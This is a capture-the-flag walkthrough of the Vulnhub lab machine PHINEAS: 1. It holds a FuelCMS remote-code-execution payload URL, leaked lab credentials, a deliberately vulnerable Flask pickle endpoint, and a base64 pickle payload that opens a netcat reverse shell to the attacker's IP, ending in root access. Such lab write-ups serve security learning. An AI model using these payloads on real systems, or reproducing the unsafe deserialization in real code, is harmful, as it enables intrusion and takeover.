PHINEAS: 1

This is PHINEAS: 1 from Vulnhub. It says:

a easy/medium web exploiting machine, with internal pivoting and CVE / RCE

Let’s go.

Ports

We’ve got four open ports:

  1. SSH on port 22
  2. HTTP on port 80
  3. RPCBind on port 111, and
  4. MySQL/MariaDB on 3306

3306

If we try to connect to the mysql instance, we get this:

──(root💀kali)-[/opt/vulnhub/phineas]
└─# mysql --host=192.168.1.202 -u root -p
Enter password: 
ERROR 1130 (HY000): Host '192.168.1.192' is not allowed to connect to this MariaDB server

So we can’t connect remotely from our IP; let’s move on.

HTTP/80

All we get at the webroot is the Apache default page for CentOS, which is the OS running on the box and it has a different Apache default to the one for Ubuntu/Debian, so that’s mildly interesting. We need to find a hidden directory; this will do it:

┌──(root💀kali)-[/opt/vulnhub/phineas]
└─# feroxbuster -u http://192.168.1.202 -w /usr/share/seclists/Discovery/Web-Content/big.txt -C 403
# stuff
301        7l       20w      239c http://192.168.1.202/structure
# more stuff

/structure is what we want. It contains an installation of FuelCMS which has a pre-auth RCE vulnerability. The installation isn’t quite standard and it takes just a little digging to figure out where to get code execution:

/structure/index.php/fuel/pages/select/?filter=filter=%27%2bpi%28print%28%24a%3d%27system%27%29%29%2b%24a%28%27COMMAND_HERE%27%29%2b%27

where COMMAND_HERE is where the command goes, duh.

I try initially for a reverse shell but can’t seem to get one to fire; between this and hacksudo3 you would think I don’t know how to get one. I resort to enumerating with cat and ls, learning we have a user called anna. We can read the Fuel database config with this:

/structure/index.php/fuel/pages/select/?filter=filter=%27%2bpi%28print%28%24a%3d%27system%27%29%29%2b%24a%28%27cat+/var/www/html/structure/fuel/application/config/database.php%27%29%2b%27

view Page Source to see the result, or use Burp Suite; we get this (amongst other things):

‘hostname’ => ‘localhost’,
‘username’ => ‘anna’,
‘password’ => ‘H993hfkNNid5kk’,

And with these credentials we can SSH in.

Anna

If we go look in anna’s files, we can find this:

[anna@phineas ~]$ cd web
[anna@phineas web]$ ls -lash
total 12K
   0 drwxr-xr-x.  4 root root   80 Apr  1 03:38 .
4.0K drwx------. 19 anna anna 4.0K Apr 16 03:51 ..
4.0K -rwxr-----.  1 root anna  263 Mar 31 05:39 app.py
4.0K -rw-------.  1 root root  591 Mar 31 04:39 app.pyc
   0 drw-------.  2 root root   32 Apr  1 03:11 __pycache__
   0 drw-------.  5 root root   74 Mar 31 04:41 python3-virtualenv
[anna@phineas web]$ cat app.py
#!/usr/bin/python3

import pickle
import base64
from flask import Flask, request

app = Flask(__name__)


@app.route("/heaven", methods=["POST"])
def heaven():
    data = base64.urlsafe_b64decode(request.form['awesome'])
    pickle.loads(data)
    return '', 204

And that (above) is basically this with a slight modification; it’s a deliberately vulnerable Flask app to demonstrate Python deserialization vulnerabilities. The source code above gives the page we want (heaven) and the name of the parameter (awesome), plus the method (POST).

Linpeas shows something running on Port 5000, so that’s what we want. Set up an SSH port forward:

ssh -L 9000:127.0.0.1:5000 anna@192.168.1.202

And we can go to localhost:9000 in the browser to see the page; not that there is anything much to see.

We can use the exact code from the blog I linked above to generate a payload, just replacing the IP with ours; then we can run it:

┌──(root💀kali)-[/opt/vulnhub/phineas]
└─# python3 exploit.py                                          
b'gASVcgAAAAAAAACMBXBvc2l4   etc

Then we just need to POST it to localhost:9000/heaven using the parameter awesome. You could use CURL, I used Burp Suite:

POST /heaven HTTP/1.1
Host: localhost:9000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 176

awesome=gASVcgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjFdybSAvdG1wL2Y7IG1rZmlmbyAvdG1wL2Y7IGNhdCAvdG1wL2YgfCAvYmluL3NoIC1pIDI-JjEgfCBuYyAxOTIuMTY4LjEuMTkyIDEyMzQgPiAvdG1wL2aUhZRSlC4=

And in our listener:

┌──(root💀kali)-[/opt/vulnhub/phineas]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.1.192] from (UNKNOWN) [192.168.1.202] 36010
sh: no job control in this shell
sh-4.2# id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_service_t:s0
sh-4.2# cd /root
cd /root
sh-4.2# ls -lash
ls -lash
total 40K
   0 drw-------.  7 root root  265 Apr  1 05:17 .
   0 dr-xr-xr-x. 17 root root  224 Nov 23 12:26 ..
4.0K -rw-------.  1 root root 1.9K Nov 23 12:27 anaconda-ks.cfg
4.0K -rw-------.  1 root root  107 Apr  1 13:56 .bash_history
4.0K -rw-r--r--.  1 root root   18 Dec 28  2013 .bash_logout
4.0K -rw-r--r--.  1 root root  176 Dec 28  2013 .bash_profile
4.0K -rw-r--r--.  1 root root  176 Dec 28  2013 .bashrc
   0 drwx------.  5 root root   42 Mar 31 04:01 .cache
   0 drwx------.  4 root root   30 Mar 31 03:52 .config
4.0K -rw-r--r--.  1 root root  100 Dec 28  2013 .cshrc
   0 drwx------.  3 root root   25 Nov 23 12:28 .dbus
   0 drwxr-xr-x.  4 root root   31 Apr  1 05:17 .gem
4.0K -rw-------.  1 root root 2.0K Nov 23 12:29 initial-setup-ks.cfg
   0 drwxr-----.  3 root root   19 Mar 31 03:58 .pki
4.0K -rw-------.  1 root root   32 Mar 31 05:22 root.txt
4.0K -rwx--x--x.  1 root root   43 Mar 31 05:26 run_flask.sh
4.0K -rw-r--r--.  1 root root  129 Dec 28  2013 .tcshrc
sh-4.2# cat root.txt && date && hostname && id
cat root.txt && date && hostname && id
YW5uYW1hcmlhbmljb3NhbnRpdml2ZSE
Fri Apr 16 04:46:49 EDT 2021
phineas
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_service_t:s0
sh-4.2# 

Kerchow.